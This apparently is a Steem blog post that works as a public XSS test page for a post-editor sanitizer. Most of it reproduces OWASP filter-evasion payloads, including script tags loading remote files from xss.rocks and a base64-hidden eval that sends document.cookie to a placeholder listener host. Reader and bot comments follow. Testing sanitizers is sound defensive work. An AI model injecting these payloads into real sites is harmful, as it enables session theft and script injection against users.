Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet

in #steemworld5 years ago (edited)

This post acts as a public XSS Security Test for my upcoming Post Editor on SteemWorld. Of course, it can be used to test against many different XSS attacks on other platforms as well. If you should see a message stating 'XSS', the Steem platform you are using may not be secure and the developers need to be contacted immediately.

Since I recently finished the Sanitizer Module of my HTML Parser for the Editor, it's now time to test different scripting attacks and I think it is a good idea to have a post to be able to easily test any coming changes in future. A few things might still be added in the next few days.

I've spent some time checking the official XSS Filter Evasion Cheat Sheet (last revision: 02/23/2019) and included the relevant attacks in this post.

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

javascript:/--><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>

<IMG SRC="javascript:alert('XSS');">


<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>


<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG SRC=javascript:alert("RSnake says, 'XSS'")>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG """>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


<IMG SRC=# onmouseover="alert('xxs')">


<IMG SRC= onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">


<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))">

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">


<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=javascript:alert(
'XSS')> 

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


<IMG SRC="jav   ascript:alert('XSS');">


<IMG SRC="jav&#x09;ascript:alert('XSS');">


<IMG SRC="jav&#x0A;ascript:alert('XSS');">


<IMG SRC="jav&#x0D;ascript:alert('XSS');">


<IMG SRC=" &#14;  javascript:alert('XSS');">


<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"> 
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> 
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
<SCRIPT/SRC="http://xss.rocks/xss.js"> 
<<SCRIPT>alert("XSS");//<</SCRIPT>

<

<SCRIPT SRC=http://xss.rocks/xss.js?< B >

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">


<IMG LOWSRC="javascript:alert('XSS')">


<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  • XSS
    <IMG SRC='vbscript:msgbox("XSS")'>


    <IMG SRC="livescript:[code]">


    <svg/onload=alert('XSS')>

    <svg/onload=alert('XSS')>

    <BODY ONLOAD=alert('XSS')>
    <BODY ONLOAD=alert('XSS')> 
    <BGSOUND SRC="javascript:alert('XSS');">


    <BR SIZE="&{alert('XSS')}">



    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">


    <LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">


    <STYLE>@import'http://xss.rocks/xss.css';</STYLE>

    <META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">


    <STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

    <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">


    exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

    exp/*

    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

    <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

    <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

    <XSS STYLE="xss:expression(alert('XSS'))">


    <XSS STYLE="behavior: url(xss.htc);">


    ¼script¾alert(¢XSS¢)¼/script¾

    ¼script¾alert(¢XSS¢)¼/script¾

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">


    <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">


    <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">


    <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
    (Unsupported javascript:alert('XSS');)
    <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
    (Unsupported #)
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>


    <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

    <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>

    <DIV STYLE="background-image: url(javascript:alert('XSS'))">

    <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>

    <DIV STYLE="width: expression(alert('XSS'));"></DIV>

    (html comment removed: [if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif])

    (html comment removed: [if gte IE 4]>

    <![endif]) 
    <BASE HREF="javascript:alert('XSS');//">


    <OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>

    <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

    <XML ID="xss"><I><B><IMG SRC="javas(html comment removed:  )cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>



    <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

    <img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">

    If you are a developer and you should need help in protecting your app against such attacks, feel free to leave me a message ;)

    Just to be safe,


    #dev #security #xss #owasp
    5 years ago in #steemworld by
    $54.56
    • Past Payouts $54.56, 0.00 TRX
    • - Author $42.32, 0.00 TRX
    • - Curators $12.24, 0.00 TRX
    824 votes
    Reply 15
    Sort:  
  • Trending
    • [-]
     5 years ago 

    Der erste (fach-)chinesische Post den ich komplett durchgescrollt habe :))
    könnte aber auch klingonisch oder romulanisch sein!

    LG

    $0.10
    • Past Payouts $0.10, 0.00 TRX
    • - Author $0.08, 0.00 TRX
    • - Curators $0.03, 0.00 TRX
    1 vote
    Reply
    [-]
     5 years ago 

    Ich verstehe zwar nicht komplett - trotzdem danke dir für deine Arbeit! ;)

    Posted using Partiko Android

    $0.10
    • Past Payouts $0.10, 0.00 TRX
    • - Author $0.08, 0.00 TRX
    • - Curators $0.03, 0.00 TRX
    1 vote
    Reply
    [-]
     5 years ago 

    Thanks keeping us safe.

    $0.07
    • Past Payouts $0.07, 0.00 TRX
    • - Author $0.06, 0.00 TRX
    • - Curators $0.02, 0.00 TRX
    1 vote
    Reply
    [-]
     5 years ago 

    Yes, there must be a proper security to ensure that the apps should be safe.

    $0.07
    • Past Payouts $0.07, 0.00 TRX
    • - Author $0.06, 0.00 TRX
    • - Curators $0.02, 0.00 TRX
    1 vote
    Reply
    [-]
     5 years ago 

    This post has been included in the latest edition of SoS Daily News - a digest of all the latest news on the Steem blockchain.

    $0.07
    • Past Payouts $0.07, 0.00 TRX
    • - Author $0.05, 0.00 TRX
    • - Curators $0.02, 0.00 TRX
    1 vote
    Reply
    [-]
     5 years ago 

    Everything is okay! 👌

    You received an automatic vote, because I believe in you and I love what you create! ;)

    A huge hug from @amico! 🤗

    I love promoting !sbi status

    $0.07
    • Past Payouts $0.07, 0.00 TRX
    • - Author $0.05, 0.00 TRX
    • - Curators $0.02, 0.00 TRX
    1 vote
    Reply
    [-]
     5 years ago 

    Hi @amico!

    • you have 140 units and 510 bonus units
    • your rshares balance is 2513443120490 or 1.556 $
    • your next SBI upvote is predicted to be 0.311 $


      Did you know Steem Basic Income has a Quality Policy?
    $0.11
    • Past Payouts $0.11, 0.00 TRX
    • - Author $0.09, 0.00 TRX
    • - Curators $0.02, 0.00 TRX
    6 votes
    Reply
    [-]
     5 years ago 

    On a completely different note . . . I've noticed that when I edit a post, if it has a self vote steemworld counts it again. Is it possible to make it so it the vote only gets counted once? The way it works currently means my self vote level shows as higher than it truly is.

    No idea how easy or not that is to do but thought I'd mention it.

    Thanks for all the great work you do. 😊

    $0.03
    • Past Payouts $0.03, 0.00 TRX
    • - Author $0.03, 0.00 TRX
    • - Curators $0.01, 0.00 TRX
    2 votes
    Reply
    [-]
     5 years ago 

    I checked your self-vote rate and it seems to be correct. You created 7 posts and voted all of them with 100% (I couldn't even find an edited post). Since you only vote yourself and @artysteps (Looks like another account by you) with 100% and you vote all other accounts with 10-50%, I think your self-vote rate should in fact be much higher (at least 45%).

    Keep in mind that on some day you might get flagged heavily by some whales for that ;)

    $1.03
    • Past Payouts $1.03, 0.00 TRX
    • - Author $0.78, 0.00 TRX
    • - Curators $0.25, 0.00 TRX
    7 votes
    Reply
    [-]
     5 years ago 

    Hmmm. Ok. But I'm not sure why you can't see any edited some posts I definitely corrected a couple of spelling mistakes. Not important though. Thanks for checking.

    $0.00
      Reply
      [-]
       5 years ago 

      You just rose by 20.17% upvote from @curationhelper courtesy of @der-prophet

      $0.00
        Reply
        [-]
         5 years ago 

        This post has been just added as new item to timeline of SteemWorld on Steem Projects.

        If you want to be notified about new updates from this project, register on Steem Projects and add SteemWorld to your favorite projects.

        $0.00
          Reply
          [-]
           5 years ago 

          Hi @steemchiller!

          Your post was upvoted by @steem-ua, new Steem dApp, using UserAuthority for algorithmic post curation!
          Your UA account score is currently 6.244 which ranks you at #236 across all Steem accounts.
          Your rank has improved 1 places in the last three days (old rank 237).

          In our last Algorithmic Curation Round, consisting of 182 contributions, your post is ranked at #12.

          Evaluation of your UA score:
          • You've built up a nice network.
          • The readers appreciate your great work!
          • Good user engagement!

          Feel free to join our @steem-ua Discord server

          $0.00
            Reply

            Coin Marketplace

            STEEM 0.30
            TRX 0.11
            JST 0.033
            BTC 64271.38
            ETH 3157.43
            USDT 1.00
            SBD 4.25